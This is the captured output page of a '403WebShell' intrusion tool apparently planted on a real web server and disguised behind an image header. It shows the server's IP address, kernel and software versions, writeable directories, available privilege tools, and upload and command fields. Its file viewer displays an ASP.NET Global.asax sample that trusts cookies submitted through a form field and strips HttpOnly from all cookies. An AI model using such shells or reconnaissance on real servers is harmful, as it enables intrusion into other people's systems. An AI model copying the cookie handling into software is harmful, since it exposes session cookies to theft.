????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/project/universal_old/FileProcessingScripts/ASP.NET/CSharp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/project/universal_old/FileProcessingScripts/ASP.NET/CSharp//Global.asax
<%@ Application Language="C#" %>
<script runat="server">

/* 

C# Global.asax file for ASP.NET sample. 
Workaround for Flash Player bug. Flash Player don't sends cookies in non-IE browsers.
MultiPowUpload has workaround-it sends Cookies at Post request by "MultiPowUpload_browserCookie" field.
This Global.asax parses this value and sets at Request.Cookies collection.
Also this script remove httpOnly attribut from all cookies to allow MultiPowUpload read them in browse using JavaScript.

NOTE: this issue occurs only when files uploaded using standard RFC compliant method.
	If you configure MultiPowUPload to use chunked upload mode, cookies correctly included into request headers in all browsers!
*/


	void Application_BeginRequest(object sender, EventArgs e)
	{
		/* Trying restore browser cookies because Flash Player do not send them in non-IE browsers*/

		try
		{
			string cookieParamName = "MultiPowUpload_browserCookie";			
			
			NameValueCollection browserCookie = new NameValueCollection();
			if(HttpContext.Current.Request.Form[cookieParamName] != null)
			{
				browserCookie = getCookieArray(HttpContext.Current.Request.Form[cookieParamName]);
				foreach (string s in browserCookie) 
					UpdateCookie(s, browserCookie[s]);	
			}
		}
		catch (Exception ex)
		{			

		}
	}
	void UpdateCookie(string cookieName, string cookieValue)
	{
		HttpCookie cookie = HttpContext.Current.Request.Cookies.Get(cookieName);
		if (cookie == null)
		{
			cookie = new HttpCookie(cookieName);
			HttpContext.Current.Request.Cookies.Add(cookie);
		}
		cookie.Value = cookieValue;
		HttpContext.Current.Request.Cookies.Set(cookie);
	}

	NameValueCollection getCookieArray(string cookie)
	{
		string[] split = cookie.Split(';');
		string[] splitParam = null;
		NameValueCollection  returnArr = new NameValueCollection();
        	foreach (string s in split) 
		{
			splitParam = s.Split('=');	
			if(splitParam.Length > 1)
				returnArr.Add(splitParam[0].Trim(), splitParam[1].Trim());			
			else
				returnArr.Add(splitParam[0].Trim(), "");			

		}
		return returnArr;

	}
	
	void Application_EndRequest(object sender, EventArgs e) 
	{
		//remove httpOnly attribute from all cookies to allow MultiPowUpload read them in browse using JavaScript.
		/*IF YOU HAVE EXCEPTION IN THIS FUNCTION:
		 Comment this code if your web application runs under ASP.NET version < 2.0
		 HttpOnly was introduced only in ASP.NEt 2.0, so there is no HttpOnly property in HttpCookie class under ASP.NET 1.0 or 1.1.
		*/
		if(Response.Cookies.Count > 0)
		   foreach(string s in Response.Cookies.AllKeys)        					
				   Response.Cookies[s].HttpOnly = false;
	}
	
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit